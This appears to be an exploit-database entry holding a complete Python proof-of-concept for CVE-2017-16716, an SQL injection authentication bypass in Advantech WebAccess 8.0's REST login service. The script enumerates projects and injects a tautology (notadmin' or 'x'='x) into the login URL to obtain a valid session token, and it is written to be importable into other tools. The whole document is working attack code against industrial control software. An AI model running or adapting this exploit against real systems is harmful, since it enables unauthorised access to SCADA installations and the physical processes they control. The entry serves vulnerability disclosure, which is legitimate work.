Advantech WebAccess 8.0-2015.08.16 SQL Injection

`#!/usr/bin/python2.7  
  
# Exploit Title: Advantech WebAccess BWSCADARest Login Method SQL Injection Authentication Bypass Vulnerability  
# Date: 01-13-2018  
# Exploit Author: Chris Lyne (@lynerc)  
# Vendor Homepage: www.advantech.com  
# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe  
# Version: Advantech WebAccess 8.0-2015.08.16  
# Tested on: Windows Server 2008 R2 Enterprise 64-bit  
# CVE : CVE-2017-16716  
# See Also: http://zerodayinitiative.com/advisories/ZDI-18-065/  
  
# Notes:  
#  
# There are two service interfaces:  
# 1) SOAP  
# 2) REST  
#  
# This PoC targets REST  
#  
# The web services did not work out of the box, and a new website/app was created in IIS for testing.  
# This issue was potentially due to the fact that testing was completed against a trial version.  
# PoC may need slight tweaks depending on configuration of the web service.  
#  
# Original vulnerability was reported for more recent software version.  
#  
# This WebAccessAuthBypass class can be imported :-)   
  
import sys, requests  
from xml.etree import ElementTree  
  
class WebAccessAuthBypass:  
def __init__(self, ip, port):  
self.ip = ip  
self.port = port  
self.base_url = "http://%s:%s/BWMobileService/BWScadaRest.svc/" % (ip, port)  
  
def convert_entities(self, s):  
return s.replace('>', '>').replace('<', '<') # convert html entities in response, for parsing  
  
def get_project_list(self):  
print 'Getting list of projects...'  
res = requests.get(self.base_url)  
projects = list()  
if res.status_code != 200:  
print 'Bad HTTP response...'  
else:  
if 'PROJECT' not in res.text:  
print 'No projects listed by service.'  
else:  
s = self.convert_entities(res.text)  
xml = ElementTree.fromstring(s)  
for project_list in xml:  
for project in project_list:  
name = project.get('NAME')  
if name is not None:  
projects.append(name)  
if len(projects) > 0:  
print 'Found the following projects: ' + str(projects)  
return projects  
else:  
return None  
  
# returns a token  
def login(self, project):  
# SQL Injection into the user parameter  
url = self.base_url + "Login/" + project + "/notadmin'%20or%20'x'%3D'x/nopass" # notadmin' or 'x'='x  
res = requests.get(url)  
token = None  
if res.status_code != 200:  
print 'Bad HTTP response...'  
else:  
if 'OK TOKEN' not in res.text:  
print 'No token returned by service.'  
else:  
s = self.convert_entities(res.text)  
xml = ElementTree.fromstring(s)  
if len(xml) > 0:  
token = xml[0].get('TOKEN')  
return token  
  
# token returned can be used for more transactions  
def get_token(self):  
project_list = self.get_project_list()  
project = project_list[0] # might as well pick the first project  
token = self.login(project_list[0])  
return token  
  
if __name__ == "__main__":  
ip = 'targetip'  
port = 'port#'  
bypass = WebAccessAuthBypass(ip, port)  
token = bypass.get_token()  
  
if token is not None:  
print 'Successfully got an authentication token: ' + token  
else:  
print 'Unsuccessful.'  
  
  
`